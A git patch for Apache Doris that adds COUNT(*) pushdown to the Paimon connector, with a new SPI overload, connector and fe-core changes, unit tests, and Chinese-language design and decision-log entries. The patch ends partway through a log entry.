`boolean countPushdown`, delegating to the 6-arg variant — mirrors the limit/requiredPartitions extension chain; other connectors are no-op (E15). - fe-core (PluginDrivenScanNode.getSplits): read getPushDownAggNoGroupingOp()==TPushAggOp.COUNT and forward the flag. No post-loop math. - connector (PaimonScanPlanProvider): extract planScanInternal(...,countPushdown) (4-arg delegates false, new 7-arg delegates the flag); add the count short-circuit as the FIRST routing arm (a count-eligible split must not also emit a data range, else BE double-counts vs deletion vectors / PK merge); collapse-to-one — sum every count-eligible split's mergedRowCount and emit ONE JNI count range bearing the total (= legacy's <=10000 singletonList + assignCountToSplits case). New members: static isCountPushdownSplit + buildCountRange. Param shape = boolean (BE only needs COUNT-vs-not), scope = paimon-only (default no-op). legacy's >10000 parallel-split trim is intentionally dropped (connector has no numBackends, an fe-core-only concern) — perf-only divergence, result identical (DV-032). No new thrift, no BE change. Tests: connector PaimonScanPlanProviderTest +2 — isCountPushdownSplit eligibility on a real split (true/2, disabled/false); end-to-end planScan over a PARTITIONED PK table with asymmetric per-partition counts (2 + 3) asserting collapse-to-one carrying the SUM (5, unreachable from any single split) and no row_count when the flag is off. Connector 252/0/0 (1 CI-gated live skip), fe-core compile + checkstyle 0, import-gate clean. Fail-before verified: neuter isCountPushdownSplit->false -> the count tests red; mutate `countSum +=` -> `=` -> the cross-split-sum assertion red. Real BE CountReader selection / EXPLAIN = CI-gated live-e2e (existing legacy paimon count regression covers the BE contract). Adversarially reviewed (workflow wf_6ead7c2c-b58): one MAJOR caught and fixed (the collapse/sum test was degenerate on a single-split fixture); two MINORs refuted (batch-path signal moot for paimon; EXPLAIN count-line drop is cosmetic, noted in DV-032). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../api/scan/ConnectorScanPlanProvider.java | 31 +++++ .../paimon/PaimonScanPlanProvider.java | 89 ++++++++++++++ .../paimon/PaimonScanPlanProviderTest.java | 112 ++++++++++++++++++ .../datasource/PluginDrivenScanNode.java | 11 +- plan-doc/01-spi-extensions-rfc.md | 18 +++ plan-doc/decisions-log.md | 12 +- plan-doc/deviations-log.md | 16 +++ plan-doc/task-list-P5-rereview2-fixes.md | 8 +- .../designs/P5-fix-COUNT-PUSHDOWN-design.md | 99 ++++++++++++++++ 9 files changed, 392 insertions(+), 4 deletions(-) create mode 100644 plan-doc/tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java index 1c472fbb22f303..18f57dc1140910 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java @@ -126,6 +126,37 @@ default List planScan( return planScan(session, handle, columns, filter, limit); } + /** + * Plans the scan, signalling whether a no-grouping {@code COUNT(*)} is being pushed down here. + * + *

      When {@code countPushdown} is true, the engine has determined the query is a no-grouping + * {@code COUNT(*)} (Nereids {@code getPushDownAggNoGroupingOp()==COUNT}) and BE is already in + * count mode. A connector that can produce a precomputed row count for (some of) its splits + * should emit it so BE serves the count from metadata instead of materializing rows + * (e.g. Paimon's {@code DataSplit.mergedRowCount()}). The default ignores the flag and delegates + * to the 6-arg variant, so connectors without a metadata row count are unaffected and keep the + * normal scan.

      + * + * @param session the current session + * @param handle the table handle + * @param columns the columns to read + * @param filter an optional remaining filter expression + * @param limit the maximum number of rows to return, or -1 for no limit + * @param requiredPartitions the pruned partition spec strings, or null/empty for all + * @param countPushdown whether a no-grouping {@code COUNT(*)} is being pushed down to this scan + * @return a list of scan ranges + */ + default List planScan( + ConnectorSession session, + ConnectorTableHandle handle, + List columns, + Optional filter, + long limit, + List requiredPartitions, + boolean countPushdown) { + return planScan(session, handle, columns, filter, limit, requiredPartitions); + } + /** * Whether this connector supports batched / streaming split generation for a partitioned scan. * diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index ca67e39b76a1f8..449d0e4243cd0e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -245,6 +245,33 @@ public List planScan( ConnectorTableHandle handle, List columns, Optional filter) { + return planScanInternal(session, handle, columns, filter, false); + } + + /** + * COUNT(*)-pushdown-aware scan entry (FIX-COUNT-PUSHDOWN). The generic {@code PluginDrivenScanNode} + * forwards the no-grouping {@code COUNT(*)} signal here via the SPI's count-pushdown overload. + * {@code limit} and {@code requiredPartitions} are not consumed by the paimon read path (same as + * the other overloads, whose defaults fold down to the 4-arg {@code planScan}). + */ + @Override + public List planScan( + ConnectorSession session, + ConnectorTableHandle handle, + List columns, + Optional filter, + long limit, + List requiredPartitions, + boolean countPushdown) { + return planScanInternal(session, handle, columns, filter, countPushdown); + } + + private List planScanInternal( + ConnectorSession session, + ConnectorTableHandle handle, + List columns, + Optional filter, + boolean countPushdown) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; Table table = resolveScanTable(paimonHandle); @@ -306,8 +333,30 @@ public List planScan( Collections.emptyMap(), false, cppReader)); } + // COUNT(*) pushdown (FIX-COUNT-PUSHDOWN): collapse every split whose merged (post-merge / + // post-deletion-vector) row count is precomputed into ONE count range carrying the summed + // total, emitted after the loop — BE serves the count from table_level_row_count (CountReader) + // without reading data. Mirrors legacy PaimonScanNode's count short-circuit, which is the + // FIRST routing arm (BEFORE the native/JNI gate): a count-eligible split must NOT also emit a + // data range, or BE would re-scan and double-count against deletion vectors / PK merge. The + // collapse == legacy's <=10000 case (singletonList(first) + assignCountToSplits([one], sum) -> + // one split bearing the full total); legacy's >10000 parallel-split trim needs numBackends (an + // fe-core-only concern) and is intentionally dropped -> perf-only divergence [deviations-log]. + // Splits WITHOUT a precomputed merged count fall through to the normal native/JNI routing so + // BE still counts them from file metadata / by reading. + long countSum = 0; + DataSplit countRepresentative = null; + // Process DataSplits for (DataSplit dataSplit : dataSplits) { + if (isCountPushdownSplit(countPushdown, dataSplit)) { + countSum += dataSplit.mergedRowCount(); + if (countRepresentative == null) { + countRepresentative = dataSplit; + } + continue; + } + Map partitionValues = getPartitionInfoMap( table, dataSplit.partition(), session.getTimeZone()); @@ -333,6 +382,15 @@ public List planScan( } } + // Emit the single collapsed count range carrying the summed total (legacy's <=10000 case: one + // split bearing the full count). Skipped when no split had a precomputed merged count. + if (countRepresentative != null) { + Map partitionValues = getPartitionInfoMap( + table, countRepresentative.partition(), session.getTimeZone()); + ranges.add(buildCountRange( + countRepresentative, tableLocation, partitionValues, cppReader, countSum)); + } + return ranges; } @@ -506,6 +564,37 @@ private PaimonScanRange buildJniScanRange(Split split, String tableLocation, .build(); } + /** + * Whether a {@link DataSplit} contributes a precomputed COUNT(*)-pushdown row count: true iff count + * pushdown is active for this scan AND the split's merged (post-merge / post-deletion-vector) row + * count is precomputed by the paimon SDK. Mirrors legacy {@code PaimonScanNode}'s count gate + * ({@code applyCountPushdown && dataSplit.mergedRowCountAvailable()}, the FIRST routing arm). + * Extracted as a pure static so the correctness-critical count routing decision is unit-testable + * with a real {@link DataSplit}, like {@link #shouldUseNativeReader}. + */ + static boolean isCountPushdownSplit(boolean countPushdown, DataSplit dataSplit) { + return countPushdown && dataSplit.mergedRowCountAvailable(); + } + + /** + * Builds the single collapsed COUNT(*)-pushdown range: a JNI-serialized {@link DataSplit} (legacy + * {@code new PaimonSplit(dataSplit)}) carrying the summed merged row count via {@code paimon.row_count} + * → BE's {@code table_level_row_count} → {@code CountReader}, so BE emits the count without + * reading data. The serialization format honors the cpp-reader flag, like {@link #buildJniScanRange}. + */ + private PaimonScanRange buildCountRange(DataSplit dataSplit, String tableLocation, + Map partitionValues, boolean cppReader, long rowCount) { + String serializedSplit = encodeSplit(dataSplit, cppReader); + return new PaimonScanRange.Builder() + .fileFormat("jni") + .paimonSplit(serializedSplit) + .tableLocation(tableLocation) + .partitionValues(partitionValues) + .selfSplitWeight(computeSplitWeight(dataSplit)) + .rowCount(rowCount) + .build(); + } + private long computeSplitWeight(DataSplit dataSplit) { List metas = dataSplit.dataFiles(); if (metas != null && !metas.isEmpty()) { diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 5668f45fb955f1..7cd1fad206cb30 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -18,6 +18,8 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorColumnHandle; +import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.thrift.TFileScanRangeParams; import org.apache.doris.thrift.TPrimitiveType; @@ -497,6 +499,116 @@ public void nonDataSplitStaysJavaSerializedEvenWithCppFlag() throws Exception { "a non-DataSplit must never take the native format, even with the cpp flag on"); } + @Test + public void countPushdownSplitDetectedOnlyWhenAggCountAndMergedCountAvailable( + @TempDir Path warehouse) throws Exception { + // FIX-COUNT-PUSHDOWN (M-2): a freshly written PK-table split has a precomputed merged + // (post-merge / post-deletion-vector) row count, so a COUNT(*) over it can be served from + // metadata instead of materializing rows. + DataSplit dataSplit = buildRealDataSplit(warehouse); + Assertions.assertTrue(dataSplit.mergedRowCountAvailable(), + "precondition: a freshly written PK split has a precomputed merged row count"); + Assertions.assertEquals(2L, dataSplit.mergedRowCount(), "two rows were written"); + + // WHY: the count branch must fire ONLY when BOTH the agg is COUNT (countPushdown) AND the SDK + // precomputed the post-merge count — mirrors legacy `applyCountPushdown && + // dataSplit.mergedRowCountAvailable()`. MUTATION: dropping `countPushdown &&` (or hard-coding + // the helper to false) -> one of these two assertions flips -> red. + Assertions.assertTrue(PaimonScanPlanProvider.isCountPushdownSplit(true, dataSplit), + "a count query over a split with a precomputed merged count must push the count down"); + Assertions.assertFalse(PaimonScanPlanProvider.isCountPushdownSplit(false, dataSplit), + "without count pushdown a split must take the normal scan path, never the count branch"); + } + + @Test + public void countPushdownCollapsesMultipleSplitsToOneRangeBearingSummedTotal( + @TempDir Path warehouse) throws Exception { + // A PARTITIONED PK table with TWO partitions of DIFFERENT row counts (pt=1 -> 2 rows, pt=2 -> + // 3 rows) yields TWO count-eligible DataSplits with ASYMMETRIC mergedRowCounts (2 and 3). This + // is deliberately multi-split with asymmetric counts so the test pins BOTH halves of the fix's + // collapse-to-one (design D-054): (a) collapse N->1 — exactly ONE range despite >=2 eligible + // splits, and (b) cross-split summation — the one range carries 2+3=5, a total NOT reachable + // from any single split (so first-split-only / last-split-wins / per-split-emit all go red). + // (A single-split fixture would make these assertions degenerate — sum==first==last for N=1.) + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("pt", DataTypes.INT()) + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .partitionKeys("pt") + .primaryKey("pt", "id") + .option("bucket", "1") + .build(), false); + Table table = catalog.getTable(id); + BatchWriteBuilder wb = table.newBatchWriteBuilder(); + try (BatchTableWrite write = wb.newWrite()) { + write.write(GenericRow.of(1, 1, 100L)); // pt=1: 2 rows + write.write(GenericRow.of(1, 2, 200L)); + write.write(GenericRow.of(2, 1, 300L)); // pt=2: 3 rows + write.write(GenericRow.of(2, 2, 400L)); + write.write(GenericRow.of(2, 3, 500L)); + List messages = write.prepareCommit(); + try (BatchTableCommit commit = wb.newCommit()) { + commit.commit(messages); + } + } + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = table; + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + ConnectorSession session = sessionWithProps(Collections.emptyMap()); + List noColumns = Collections.emptyList(); + + // Precondition: the read plan really does produce >=2 count-eligible DataSplits (else the + // collapse assertion below would be degenerate). This guards the fixture itself. + int eligibleSplits = 0; + for (Split s : table.newReadBuilder().newScan().plan().splits()) { + if (s instanceof DataSplit + && PaimonScanPlanProvider.isCountPushdownSplit(true, (DataSplit) s)) { + ++eligibleSplits; + } + } + Assertions.assertTrue(eligibleSplits >= 2, + "fixture precondition: two partitions must yield >=2 count-eligible splits, got " + + eligibleSplits); + + // count pushdown ON: collapse-to-one — exactly ONE range carrying the SUMMED total (5). + // MUTATION (collapse): per-split emit -> >=2 ranges carry row_count -> countRanges!=1 -> red. + // MUTATION (sum): `countSum = split.mergedRowCount()` (first/last-wins instead of +=) -> "2" + // or "3" instead of "5" -> red. So both halves of design D-054 are pinned. + List withCount = provider.planScan( + session, handle, noColumns, Optional.empty(), -1, null, /*countPushdown*/ true); + int countRanges = 0; + String emittedCount = null; + for (ConnectorScanRange r : withCount) { + String v = r.getProperties().get("paimon.row_count"); + if (v != null) { + ++countRanges; + emittedCount = v; + } + } + Assertions.assertEquals(1, countRanges, + "count pushdown must collapse >=2 eligible splits into exactly ONE count range"); + Assertions.assertEquals("5", emittedCount, + "the single count range must carry the cross-split SUM (2 + 3 = 5), " + + "a total unreachable from any single split"); + + // count pushdown OFF: no range may carry a pushed-down row count (normal scan; BE counts). + // MUTATION: emitting row_count regardless of the flag -> red. + List withoutCount = provider.planScan( + session, handle, noColumns, Optional.empty(), -1, null, /*countPushdown*/ false); + for (ConnectorScanRange r : withoutCount) { + Assertions.assertFalse(r.getProperties().containsKey("paimon.row_count"), + "without count pushdown no range may carry a pushed-down row count"); + } + } + } + private static ConnectorSession sessionWithProps(Map sessionProps) { return new ConnectorSession() { @Override diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index c51afb63a63b47..da1bebe1960998 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -52,6 +52,7 @@ import org.apache.doris.thrift.TFileFormatType; import org.apache.doris.thrift.TFileRangeDesc; import org.apache.doris.thrift.TFileTextScanRangeParams; +import org.apache.doris.thrift.TPushAggOp; import org.apache.doris.thrift.TTableFormatFileDesc; import org.apache.logging.log4j.LogManager; @@ -561,8 +562,16 @@ public List getSplits(int numBackends) throws UserException { // the rows the source returns, that would under-return. Legacy disabled limit-split whenever // a non-partition-equality (incl. CAST) predicate was present; this mirrors it. long sourceLimit = effectiveSourceLimit(limit, filteredToOriginalIndex != null); + // Forward the no-grouping COUNT(*) signal to the connector (FIX-COUNT-PUSHDOWN). The op is set + // on this node by the Nereids translator (PhysicalPlanTranslator) and shipped to BE via + // FileScanNode.toThrift, but a connector that can serve a precomputed row count + // (paimon DataSplit.mergedRowCount()) needs the signal here to emit it; otherwise BE + // materializes the full post-merge row set just to count. Connectors that do not override the + // count-pushdown overload ignore the flag (default delegates to the 6-arg planScan). + boolean countPushdown = getPushDownAggNoGroupingOp() == TPushAggOp.COUNT; List ranges = scanProvider.planScan( - connectorSession, currentHandle, columns, remainingFilter, sourceLimit, requiredPartitions); + connectorSession, currentHandle, columns, remainingFilter, sourceLimit, + requiredPartitions, countPushdown); List splits = new ArrayList<>(ranges.size()); for (ConnectorScanRange range : ranges) { diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index 7f0c85c8a2e794..612a62d2dbe40d 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -1333,3 +1333,21 @@ fi **已知 SPI gap(不在本 fix close)**:scan-time driver-path 校验**无** `ConnectorContext` hook(连接器 scan-time 拿不到 `ConnectorValidationContext`)→ 校验仅 CREATE-time(FE-restart/ALTER 不复校),是 pre-existing fe-core 缝、全 plugin 连接器共有。用户定接受(CREATE-time parity),跨连接器 follow-up 须新 `ConnectorContext` 校验 hook + fe-core ALTER 路接 `preCreateValidation`。详 [DV-028](./deviations-log.md)。 **测**:连接器 `PaimonScanPlanProviderTest` +5(resolve 裸名、认 paimon.jdbc.* 别名、双别名优先序+override、保 scheme-bearing、非-jdbc 空)+ 新 `PaimonConnectorPreCreateValidationTest` +5(jdbc/别名 调校验、非-jdbc/无 driver_url 不调、reject 传播)。模块 232/0/0、fail-before 5/9 向红。真值闸=`test_paimon_jdbc_catalog`(CI-gated)。 + +## 25. 扩展 E15:COUNT(\*) 下推信号 / `planScan(...,boolean countPushdown)` overload + +> 后补节(2026-06-12,P5-fix#8 FIX-COUNT-PUSHDOWN)。finding M-2(round-2 MAJOR/round-1 MINOR,perf-parity)—— 见 [task-list #8](./task-list-P5-rereview2-fixes.md) / [设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) / [D-054](./decisions-log.md) / [DV-032](./deviations-log.md)。**E14 之后首个新 connector-SPI(planScan 扩展链续 limit/requiredPartitions)。** + +**问题**:翻闸后 plugin-driven paimon `COUNT(*)` 结果正确但慢——BE 已在 count 模式(`PhysicalPlanTranslator:873` 在 `PluginDrivenScanNode` 设 `pushDownAggNoGroupingOp=COUNT`,`FileScanNode.toThrift:90` 发出)且 per-range emit 缝**已建全**(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`populateRangeParams.setTableLevelRowCount`,与 legacy `PaimonScanNode:303-308` byte-一致),但 COUNT **信号** `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 连接器从不算 merged count、每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`)。merged count `DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算,故信号**必须**过 SPI 边界(否决经 `ConnectorSession` 穿——agg-op 是 per-query planner 输出非 SET-var、会成静默无类型通道,[D-054])。 + +**SPI 面(default 委托,零它连接器影响)**: +- `ConnectorScanPlanProvider.planScan(session, handle, columns, filter, limit, requiredPartitions, boolean countPushdown) → List`(`fe-connector-api`):新 **default** 方法,委托回 6 参 `planScan`(镜像既有 5 参 limit / 6 参 requiredPartitions 扩展链)→ 不 override 的连接器(es/jdbc/hive/iceberg/maxcompute/trino/hudi)忽略 flag、行为不变。 +- `countPushdown` 语义:engine 判定查询为 no-grouping `COUNT(*)`(`getPushDownAggNoGroupingOp()==TPushAggOp.COUNT`)时为 true。选 **boolean** 而非 `TPushAggOp`:BE 文件格式 count 只需 COUNT-vs-not;`MIX`/`COUNT_ON_INDEX` 不在文件格式 count 范围,`TPushAggOp` 会把 thrift 枚举拉进 SPI 签名、过度泛化。 + +**fe-core 侧**:`PluginDrivenScanNode.getSplits` 读 `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` 传入新 overload。**无 post-loop 数学**(collapse 在连接器内做,见 [D-054]/[DV-032])。 + +**连接器侧(paimon-only)**:`PaimonScanPlanProvider` 抽 `planScanInternal(...,countPushdown)`(4 参委托 false、新 7 参委托 flag),加 count 短路第一臂 + 纯静态 `isCountPushdownSplit(boolean,DataSplit)` + `buildCountRange`,**collapse-to-one** 发一个 JNI count range 携 `mergedRowCount` 之和。emit 用既有 `paimon.row_count` 缝,**无新 thrift / 无 BE 改**。 + +**作用域**:paimon-only(default no-op overload 利好将来 hive/iceberg/hudi full-adopter,各自 override 即可)。`ConnectorProvider.apiVersion()` 保持 `1`(仅新增 default,[D-009])。 + +**测**:连接器 `PaimonScanPlanProviderTest` +2(纯静态 `isCountPushdownSplit` 真 split=true/2、disabled=false;end-to-end `planScan(countPushdown=true)` 真 local PK 表 collapse-to-one 携 total=2、`false`→无 `paimon.row_count`)。模块 252/0/0(1 CI-gated skip)、fail-before 恰 2 新测红(neuter helper→false)。真值闸=live-e2e BE CountReader 选择/EXPLAIN(既有 legacy paimon count regression 覆盖 BE 契约)。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 22577f95c933e1..5279f7260c845a 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-054 | P5-fix#8 | **FIX-COUNT-PUSHDOWN(M-2,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now + 新增 default `planScan` 7-arg overload 携 `boolean countPushdown` + 连接器 collapse-to-one(用户签字,2026-06-12)**:翻闸后 plugin-driven paimon `COUNT(*)` **结果正确但慢**——COUNT 枚举已达 BE(`FileScanNode.toThrift:90` 发 `pushDownAggNoGroupingOp`、`PhysicalPlanTranslator:873` 在 plugin 节点设 COUNT、未排除)且 per-range emit 缝**已建全**(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`,与 legacy `PaimonScanNode:303-308` byte-一致),唯独**信号+计算**缺:merged count `DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算,而 COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、`PluginDrivenScanNode.getSplits` 从不读(grep 0)也不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 连接器每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`),PK/MOR merge 表尤贵。**故非纯连接器(更正动手前 framing)**:信号须过 SPI 边界。**否决经 `ConnectorSession` 穿**(FIX-FORCE-JNI 先例)——agg-op 是 per-query planner 输出非 SET-var,会成静默无类型通道(本项目反复踩的 bug 类)。**用户定(vs defer)= fix-now**,且 **count-split 形状 = 连接器 collapse-to-one**(vs full-parity fe-core trim / vs per-split)。**修=3 文件**:① SPI `ConnectorScanPlanProvider` +1 **default** 7-arg `planScan(...,boolean countPushdown)` 委托 6-arg(镜像 limit/requiredPartitions 扩展链,其余连接器零改 no-op)[E15];② fe-core `PluginDrivenScanNode.getSplits` 读 `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` 传入(**无 post-loop 数学**);③ 连接器抽 `planScanInternal(...,countPushdown)`(4-arg 委托 false、7-arg 委托 flag)+ count 短路(**第一 routing 臂**,count-eligible split 不再发数据 range,否则 BE 双计 vs DV/PK-merge):累加全 eligible split 的 `mergedRowCount` 入 `countSum`、留首个为代表、循环后发**一** JNI count range 携 `countSum`(=legacy `<=10000` singletonList+assignCountToSplits 收一 split case);无 merged count 的 split 走常规 native/JNI 路 BE 自计(footer/物化)。两新成员=纯静态 `isCountPushdownSplit(boolean,DataSplit)`(mutation-test 路由闸)+ `buildCountRange`。**参数形状 `boolean`**(BE 只需 COUNT-vs-not、`TPushAggOp` 过度泛化)+ **paimon-only**=工程判断(未被否)。legacy `>10000` 并行 split trim **有意丢**(连接器无 numBackends,fe-core-only)= perf-only 偏差 [DV-032]。守门:连接器 252/0/0(1 CI-gated skip)、fe-core compile+checkstyle 0、import-gate 净、**fail-before 恰 2 新测红**(neuter `isCountPushdownSplit`→false)其余 33 绿、end-to-end 真 local PK 表测断言 collapse-to-one 携 merged total(2)。真值闸=live-e2e BE CountReader 选择/EXPLAIN(既有 legacy paimon count regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) | 2026-06-12 | ✅ | | D-053 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-8(MAJOR,Kerberos-only,fe-core,filesystem+jdbc)= fix-now(用户签字,2026-06-11)**:翻闸后 filesystem/jdbc flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog` 已把建 catalog 包进 `context.executeAuthenticated`(:194),但其背后 authenticator 对这两 flavor 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()` 内构建(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`),而 `initializeCatalog` 在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`;plugin 路径经 `PaimonCatalogFactory` 自建 catalog)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` 的 no-op → `executeAuthenticated` 不 doAs。HMS 不受影响(authenticator 在 `initNormalizeAndCheckProps:70` 即建、必跑)。**作用域=filesystem+jdbc only**(用户签):DLF/REST 排除——`PaimonAliyunDLFMetaStoreProperties` 从不设 authenticator、用 Aliyun AK/SK/STS 入 HiveConf 非 Kerberos UGI(无 doAs 可丢),故 review「DLF」从句 **overstated**;HMS 已对。**修=fe-core,零连接器改/零连接器-SPI**:新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用**已安全建好**的 `catalogProperty.getOrderedStoragePropertiesList()` 调(catalog-init 时机、与 legacy 同、避免每次 `MetastoreProperties.create` eager 重复 kerberos login);filesystem/jdbc override 之经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 从 HDFS `StorageProperties` 建 authenticator(镜像 HMS)。**FE-unit 可测 wiring**(断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator`、不调 initializeCatalog),**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos regression 套件,[DV-031](./deviations-log.md))。守门:fe-core `Paimon{FileSystem,Jdbc}MetaStorePropertiesTest` 14/0/0、fail-before 双 red(no-op `AbstractPaimonProperties$1`)、checkstyle 0。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | | D-052 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-11(MAJOR,Kerberos-HMS)= full legacy parity 包全部 read RPC(用户签字,2026-06-11,取代 D7=B 的 read 从句)**:翻闸后连接器 metadata **读** RPC(listDatabases/getDatabase/listTables/getTable[getTableHandle+getSysTableHandle+resolveTable]/listPartitions)**不**包 `executeAuthenticated`,仅 4 个 DDL op 包(B3 **D7=B** 故意 read-vs-DDL 不对称、把 read-path doAs 推给 live-e2e 门)→ Kerberos HMS 上 SHOW PARTITIONS/MTMV/partitions-TVF + 任何 getTable 读 RPC 跑在 catalog principal 之外。legacy `PaimonMetadataOps`/`PaimonExternalCatalog` 包**每个** read(`getPaimonPartitions:99`、`getPaimonTable:137`、listDatabases/listTables/getDatabase)。**用户定 = full legacy parity(vs 仅包 listPartitions / vs defer)**:仅包 listPartitions 是半吊子(连分区路径自身先行的 getTable reload 都漏);defer 则须登 accepted-deviation。本签字**取代 D7=B 的 read-path 从句**(4 DDL op 仍包)。**修=连接器 only、零 SPI**:7 处 read site 包 `context.executeAuthenticated`,其中 `resolveTable`(metadata + scan 双 site)一处包覆盖所有 resolveTable 调用方(DRY)。**异常流关键**:Kerberos `UGI.doAs` 把抛出的 checked `Catalog.{Table,Database}NotExistException` 包成 `UndeclaredThrowableException`(仅 IOException/RuntimeException/Error 透传)→ 故 domain 异常**必须在 lambda 内**捕获(镜像 legacy `getPaimonPartitions:104`),listDatabases/resolveTable 的既有 catch-all 在外吸收。scan `resolveTable` 对 `context==null`(2-arg ctor 离线测)走直连,与同文件 `getScanNodeProperties` 既有 null-context 约定一致。守门:连接器模块 248/0/0(1 CI-gated skip)、新 `PaimonConnectorMetadataReadAuthTest` 12/0/0 + scan 2、fail-before 3 red(authCount/log-empty)、import-gate 净、checkstyle 0。真值闸=live Kerberos HMS e2e(CI-gated、无套件,[DV-031](./deviations-log.md))。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | | D-051 | P5-fix#5 | **FIX-MAPPING-FLAG-KEYS(M-crit MAJOR,纯连接器/FE-wiring,无 BE/无 SPI)作用域 = paimon-only 修 + hive/iceberg 跨连接器 follow-up(用户签字,2026-06-11)**:翻闸后 paimon 连接器类型映射两开关**静默失效**——连接器读**下划线**键 `enable_mapping_binary_as_varbinary`/`enable_mapping_timestamp_tz`(`PaimonConnectorProperties:39,42`→`PaimonConnectorMetadata.buildTypeMappingOptions`),但 fe-core 只写**点分**键 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz`(`CatalogProperty:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306` 仅写点分键;`HIDDEN_PROPERTIES` 仅藏点分键)→ `PluginDrivenExternalCatalog.createConnectorFromProperties` 把**原始** catalog map 原样喂连接器 → `getOrDefault(下划线,"false")` 恒 false → 即便用户在 CREATE CATALOG 开启,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(legacy `PaimonExternalTable:350` 读点分键并 honor → cutover 回归,flag 启用前 latent)。binary 键**双重漂移**(分隔符 `.`→`_` 且 token `varbinary`→`binary_as_varbinary`)→ 通用归一化器修不了。**M-crit 是 critic-surfaced 未过 3-lens → 先独立复核**(5-agent scout + 对抗 synthesizer workflow `wf_a3626c54-0db` → REAL_BUG 